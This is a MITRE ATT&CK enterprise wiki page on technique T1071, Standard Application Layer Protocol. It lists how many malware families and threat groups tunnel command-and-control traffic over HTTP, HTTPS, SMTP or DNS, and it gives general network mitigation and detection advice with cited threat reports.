Standard Application Layer Protocol

From enterprise
Jump to: navigation, search
Standard Application Layer Protocol
Technique
ID T1071
Tactic Command and Control
Platform Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X
Data Sources Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring
Requires Network Yes

Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.

Examples

  • APT28 used SMTP as a communication channel in various implants, initially using self-registered Google Mail accounts and later compromised email servers of its victims. Later implants such as CHOPSTICK use a blend of HTTP and other legitimate channels, depending on module configuration.1
  • FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.2
  • A Gamaredon Group file stealer can communicate over HTTP for C2.3
  • Stealth Falcon malware communicates with its C2 server via HTTPS.4
  • 3PARA RAT uses HTTP for command and control.5
  • 4H RAT uses HTTP for command and control.5
  • ADVSTORESHELL connects to port 80 of a C2 server using Wininet API.6
  • BACKSPACE uses HTTP as a transport to communicate with its command server.7
  • BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.8
  • BUBBLEWRAP can communicate using HTTP or HTTPS.9
  • BlackEnergy communicates with its C2 server over HTTP.10
  • Various implementations of CHOPSTICK communicate with C2 over HTTP, SMTP, and POP3.11
  • CORESHELL can communicate over HTTP, SMTP, and POP3 for C2.112
  • The Carbanak malware communicates to its command server using HTTP with an encrypted payload.13
  • ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.1415
  • One variant of CloudDuke uses HTTP and HTTPS for C2.16
  • Cobalt Strike uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.17
  • ComRAT has used HTTP requests for command and control.18
  • CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.1619
  • CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.20
  • Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.21
  • DustySky has used both HTTP and HTTPS for C2.22
  • ELMER uses HTTP for command and control.23
  • Elise communicates over HTTP or HTTPS for C2.24
  • Emissary uses HTTP or HTTPS for C2.25
  • Epic implements a command and control protocol over HTTP.26
  • Some variants of FakeM use SSL to communicate with C2 servers.27
  • GeminiDuke uses HTTP and HTTPS for command and control.16
  • The "Uploader" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.28
  • HTTPBrowser has used HTTP, HTTPS, and DNS for command and control.2930
  • Hi-Zor communicates with its C2 server over HTTPS.31
  • JHUHUGIT communicates with its C2 server over HTTP.32
  • The Komplex C2 channel uses HTTP POST requests 33
  • LOWBALL command and control occurs via HTTPS over port 443.9
  • MiniDuke uses HTTP and HTTPS for command and control.16
  • Mis-Type network traffic can communicate over HTTP.34
  • NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2. Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519.7
  • OLDBAIT can use HTTP or SMTP for C2.1
  • OnionDuke uses HTTP and HTTPS for C2.16
  • OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.30
  • POWERSOURCE uses DNS TXT records for C2.3536
  • PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.16
  • Pisloader uses DNS as its C2 protocol.37
  • PlugX can be configured to use HTTP or DNS for command and control.30
  • Psylo uses HTTPS for C2.27
  • Pteranodon can use HTTP for C2.3
  • RARSTONE uses SSL to encrypt its communication with its C2 server.38
  • APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.39
  • RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.40
  • The Regin malware platform supports many standard protocols, including HTTP, HTTPS, and SMB.41
  • ... further results

Mitigation

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way to avoid detection by common defensive tools.42

Detection

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.42

References

  1. a b c  FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
  2. ^  FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.
  3. a b  Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  4. ^  Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.
  5. a b  Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
  6. ^  Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
  7. a b  FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.
  8. ^  Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.
  9. a b  FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
  10. ^  F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
  11. ^  ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
  12. ^  Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
  13. ^  Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 3, 2015.
  14. ^  Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
  15. ^  Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
  16. a b c d e f  F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
  17. ^  Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.
  18. ^  Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.
  19. ^  F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.
  20. ^  F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
  21. ^  Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.
  1. ^  ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
  2. ^  Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.
  3. ^  Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
  4. ^  Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
  5. ^  Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.
  6. a b  Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
  7. ^  FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.
  8. ^  Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.
  9. a b c  Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved January 25, 2016.
  10. ^  Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
  11. ^  ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
  12. ^  Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
  13. ^  Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
  14. ^  Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
  15. ^  Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.
  16. ^  Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.
  17. ^  Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.
  18. ^  Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.
  19. ^  FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
  20. ^  Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.
  21. a b  Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.